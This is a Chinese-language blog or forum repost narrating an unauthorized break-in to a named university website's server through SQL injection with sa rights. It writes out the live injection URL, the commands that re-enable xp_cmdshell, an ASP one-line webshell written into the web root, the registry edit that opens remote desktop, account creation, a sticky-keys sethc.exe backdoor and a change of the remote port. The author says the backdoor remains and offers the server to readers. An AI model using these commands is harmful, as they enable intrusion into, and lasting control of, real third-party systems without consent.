一次Sa权限入侵

唉,晚上2点了,我的课程设计报告还没写完。还有那烦人的CAD,不过这次课设,算了几个轴几个零件后,我才体会到神六神七的伟大。那玩意真不容易。整天被那几个轴,轴承,齿轮,减速器,联轴器等等烦的。不说这些了,说正题,这个网站是上次论坛一位朋友发的。我只是简单的拿了个shell给他。晚上歇会,接着上次那shell继续干。简单说下拿shell的过程。
注射点http://yjsb.ysu.edu.cn/news/view2.asp?type=news&id=2269   sa权限
啊D列出网站的根目录 D:\研究生学院网站\WebSites\
一开始网站的xpcmdshell是关闭的,恢复xpcmdshell:
‘show%20advanced%20options’,%201;RECONFIGURE;EXEC%20sp_configure%20’xp_cmdshell’,%201;RECONFIGURE;–

执行ipconfig命令测试下xpcmdshell,
master.dbo.xp_cmdshell ‘ipconfig > D:\研究生学院网站\WebSites\3.txt’–
查看http://yjsb.ysu.edu.cn/3.txt即可。
简单echo一句话进去,
master.dbo.xp_cmdshell ‘echo ^<%25execute(request(“cmd”))%25^> > D:\研究生学院网站\WebSites\12.asp’–

shell拿到了,查了下3389是关着的,sa权限开3389还是很容易的,
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–

现在能连上了,继续用xpcmdshell加个账户进去,
master.dbo.xp_cmdshell ‘net user hacker 123456 /add’–

语句成功执行,页面返回正常。但这时出了问题了。在shell里查看账户时,依然没加上。郁闷了一会,也有可能是xpcmdshell的权限不够,Mssql在以users用户组启动时,sa权限也只能是user权限。后来在盘里翻,找到了SU,提了下权失败,估计是改了密码,本地配置了个c盘用户的账号,将配置信息传上去覆盖原来的,登陆ftp,加账户时失败,如图:
Click Here To EnLarge
不过,此时已经拿下服务器一大半权限了,c盘可以浏览了。不甘心,继续,看到了pcAnywhere,下载了个cif文件,破解出账号和密码,本地特地安装了个pcAnywhere,连接时又失败,服务端没开启。忘了说下,在这之前用巴西烤肉加了一回,也是失败的。淡定,继续,既然3389开了,总不能下载gho文件或者sam文件跑密码吧,这样我宁愿放弃。连上3389,习惯性的按了5下shift,出现了粘滞键,有想法了,我有了c盘的权限,传个cmd上去代替sethc.exe,不就ok了么, 一切很顺利,出现了cmd窗口,加账户时,才豁然开朗,管理员耍的是什么鬼把戏,
Click Here To EnLarge
密码策略限制, 后来用xpcmdshell和SP_OAcreate加账户,密码设置的复杂点,一加一个准。
Click Here To EnLarge

就到这了,这台服务器我的shift后门没删。你若能找到远程端口,就能上服务器玩了。服务器上没什么,用来抓个鸡还行。就别搞破坏了。

就当是论坛开业,送个服务器给大家玩吧。

改远程端口用这句;
master.dbo.xp_cmdshell ‘reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 3388 /f’–
等服务器重启下就行。

转载自:http://bbs.virusest.com/read.php?tid=7&page=e&newreply=1&#a

 

 

“一次Sa权限入侵”的一个回复

发表评论

电子邮件地址不会被公开。 必填项已用*标注